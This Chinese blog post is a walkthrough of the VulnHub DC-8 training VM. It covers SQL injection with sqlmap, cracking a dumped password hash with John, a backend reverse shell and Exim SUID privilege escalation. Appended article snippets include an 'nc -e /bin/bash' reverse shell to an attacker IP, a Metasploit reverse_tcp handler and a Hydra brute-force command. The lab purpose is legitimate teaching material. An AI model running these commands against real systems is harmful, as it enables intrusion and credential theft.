vulnhub靶机渗透DC-8

最新推荐文章于 2024-10-23 17:59:38 发布
原创 最新推荐文章于 2024-10-23 17:59:38 发布 · 231 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

靶机入侵——DC8

1、环境搭建

下载地址:http://www.vulnhub.com/entry/dc-8,367/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24

    ​ 192.168.80.137 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.137
    在这里插入图片描述
    ​ 发现开放了80、22端口

  • web端进一步信息收集

    通过wappalyzer 插件我们收集到站点的cms、中间件、语言等信息
    在这里插入图片描述

3、漏洞挖掘与利用

  • 在翻看网站页时,发现可能存在SQL注入漏洞,经过单引号测试,发现确实存在。
    在这里插入图片描述

  • 使用sqlmap工具进行SQL注入攻击:

    获得库名:

    sqlmap -u http://192.168.80.137/?nid=2* --dbs --tamper=space2comment --leve 3
    在这里插入图片描述

    获得表名:猜测网站用户数据在d7db数据库中

    sqlmap -u http://192.168.80.137/?nid=2* -D d7db --tables
    在这里插入图片描述
    发现用户表:user,查看其字段

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users --columns
在这里插入图片描述

发现用户及密码字段,查看字段。获得账户及密码密文

sqlmap -u http://192.168.80.137/?nid=2* -D d7db -T users -C name,pass --dump
在这里插入图片描述

  • 可以尝试使用john暴力破解密文,将密文保存到pass.txt

    john --wordlist=/usr/share/john/password.lst --rules pass.txt

    先破解john用户的密码,因为一般情况非管理员的密文爆破有更大概率

    得到结果为 turtle

  • 先尝试使用john用户登录后台寻找突破口,若不能成功,则继续爆破admin用户

  • 尝试ssh登录时,发现需要秘钥。

  • 扫描网站目录,发现登录界面:dirsearch -u http://192.168.80.137/ -e* -i 200
    在这里插入图片描述

  • 使用john登录
    在这里插入图片描述

  • 后台寻找利用点 ,写入反弹命令。
    在这里插入图片描述

    写入命令
    在这里插入图片描述

    提交表单,加载含反弹命令的页面。
    在这里插入图片描述

  • 提交成功,触发反弹
    在这里插入图片描述
    在这里插入图片描述

  • 使用python获得交互式shell

    python -c ‘import pty; pty.spawn(“/bin/bash”)’

4、提权

  • 尝试免密使用的root级别命令进行提权:sudo -l 。但是执行命令需要当前用户密码。

  • 尝试SUID提权:find / -perm -4000 -print 2>/dev/null

    或者:find / -perm -u=s -type f 2>/dev/null
    在这里插入图片描述

  • 发现exim4具有suid,查看版本号,再收集对应的提权模块
    在这里插入图片描述

  • 搜索利用模块, searchsploit exim 4
    在这里插入图片描述

  • 将脚本下载到靶机,当其他目录没有写权限时,记得进入/tmp目录下载

    查看使用方法
    在这里插入图片描述
    在这里插入图片描述

    下载,添加权限,执行
    在这里插入图片描述
    利用使用说明执行命令提权,发现./46996.sh -m setuid不行,./46996.sh -m netcat可以

  • 成功提权,获得flag
    在这里插入图片描述
    在这里插入图片描述

渗透测试:DC-8靶机
Ciyaso的博客
08-23 729
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
靶机DC-8(详细渗透,适合新手渗透
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-8靶机渗透测试
读书 买花 长大
05-12 668
DC-8
DC8靶机
qq_40646572的博客
05-13 469
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
DC-8 靶机
日常打一些漏洞靶机
07-29 561
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
精选资源
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机渗透DC-1
RestoreJustice的博客
03-17 654
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里提权我们可以考虑爆破22端口或者内核提权(绝招,实在没办法在考虑),但在此之前我们可以尝试找找是否有一些拥有suid标识的命令,利用其提权。使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.3.27。而且是几年前的,可以考虑使用MSF,上面应该集成了相关漏洞利用脚本,如果没有就得手工利用了。
vulnhub靶机渗透DC-5
RestoreJustice的博客
03-17 301
前面收集信息,我们知道靶机使用nginx站点,nginx日志默认路径为/var/log/nginx/access.log。直接访问:http://192.168.80.134/%3C?反弹shell到kail中:nc -e /bin/bash/ 192.168.80.130 10086,然后利用python反弹,获得交互式shell,方便使用:python -c ‘import pty;这里连接到虚拟网卡1。下载地址:https://www.vulnhub.com/entry/dc-5,314/
精选资源
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
精选资源
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-8靶机
weixin_45778886的博客
03-26 3464
环境搭建
DC-8靶机(SQL注入,46996.sh提权)
m0_66299232的博客
11-19 637
用nmap探测靶机开放端口和对应服务情况 nmap -p- -A -T4 192.168.166.136。6.把密码写进hash.txt里用john工具破解出一个密码。1.用find命令查询以suid权限执行的文件。1.探测目标靶机ip arp-scan -l。5.开启http服务,将脚本下载到靶机8.写入php代码,反弹shell.虚拟机网络链接模式:桥接模式。2.发现一个exim4可利用。4.下载到当前目录下并查看。6.给执行权限,执行没成功。3.查询相关利用脚本。7.添加参数提权成功。
vulnhubDC8靶机
LainWith的博客
02-15 3158
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
靶机 dc系列 dc-8
wl0326ghb的博客
12-29 344
dc-8
DC靶机系列:DC-8
Ays.Ie的博客
02-28 369
本篇文章为DC系列第8靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC系列靶机-DC8
慕舟舟的博客
10-23 1225
作为一个邮件传输代理,Exim可以在不同的邮件服务器之间传递邮件,确保邮件能够正确地到达目的地。这里可以采用和dc5一样的做法;使用python搭建一个简易的服务器,将要下载的文件挂接过去;由于information_schema是MySQL的系统库,访问d7db这个数据库;根据这个版本,选择46996.sh的脚本文件来提权;用户名和密码,不过是加密的;这里存在一个上传并且解析php代码的地方;点击过程中,后面的id=1,会发生变化;这里最有可能出现的就是SQL注入;尝试搜索一下历史的漏洞;
vulnhub渗透测试靶机DC-8
weixin_46128614的博客
01-19 921
靶机下载: https://www.vulnhub.com/entry/dc-8,367/ 环境: kali:192.168.49.129 靶机:192.168.49.12 先arp扫描一下目标靶机的ip地址 发现192.168.49.12 nmap流程走一下 nmap 192.168.49.12 -p- -sV -sT -T5 -A 只开放了22和80 浏览器打开,发现是一个用Drupal搭...
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 926
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
vulnhub靶机dc-1
最新发布
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值